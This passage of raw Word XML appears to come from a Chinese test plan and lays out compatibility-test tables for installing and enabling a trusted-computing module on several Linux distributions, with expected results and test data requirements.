      <w:bookmarkEnd w:id="4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2"/>
        <w:gridCol w:w="2751"/>
        <w:gridCol w:w="2586"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3F3F2AC4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="429"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E64D6B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D8CDF59" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>执行策略</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>（安装、部署）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50614920" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7EF12EC2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75586862"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将安装不同的Linux操作系统的机器，安装可信模块，添加到server的可信列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BA966DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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Ubuntu14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CDC48D0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块安装</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E21832" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块开启</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C71EB0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块可靠性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A934D0E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="059BCD2E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="451B0533" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Redhat7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38A344CD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2A669D39" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FFFF119" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08D10BDA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Suse12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56C04D69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A76468A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DAA52A6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A3173F5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Centos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="663A6D0C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="420" w:hanging="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6FBDDE7E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="567D0C86" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16565C34" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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麒麟系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A1C0379" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="11F6BF2C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="605"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="620D880D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C29335D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00751612" w:rsidP="00A5661A">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId124" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
              <w:r w:rsidR="00C55A9C" w:rsidRPr="003914A3">
                <w:rPr>
                  <w:rStyle w:val="af3"/>
                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:u w:val="none"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>Deepin</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C55A9C" w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（深度）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A44C0E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="210683B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4210B25B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="_Toc36487993"/>
      <w:bookmarkStart w:id="439" w:name="_Toc36573261"/>
      <w:bookmarkStart w:id="440" w:name="_Toc36630347"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试数据需求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
      <w:bookmarkEnd w:id="439"/>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:p w14:paraId="15972FD1"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提前准备好测试需要用的Linux系统的机器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641227D6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="_Toc36487994"/>
      <w:bookmarkStart w:id="442" w:name="_Toc36573262"/>
      <w:bookmarkStart w:id="443" w:name="_Toc36630348"/>
      <w:r w:rsidRPr="00536672">
        <w:t>兼容性</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试结果分析方法和预期</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
      <w:bookmarkEnd w:id="442"/>
      <w:bookmarkEnd w:id="4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2"/>
        <w:gridCol w:w="2496"/>
        <w:gridCol w:w="2035"/>
        <w:gridCol w:w="2035"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B540716" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278F1E73" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="388FF639" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>执行策略</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>（安装及运行）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05E5B763" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58B8F9CD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1A2BFECF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71A0BA1F"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color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>将安装不同的Linux操作系统的机器，安装可信模块，添加到</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>server的可信列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E111D04" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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lastRenderedPageBreak/>
              <w:t>Ubuntu14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3192EFB5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D02B0A4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块安装</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B3F8522" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块开启</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EE31F13" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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lastRenderedPageBreak/>
              <w:t>可信计算模块可靠性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5DFF9D95" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24DB1C0D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
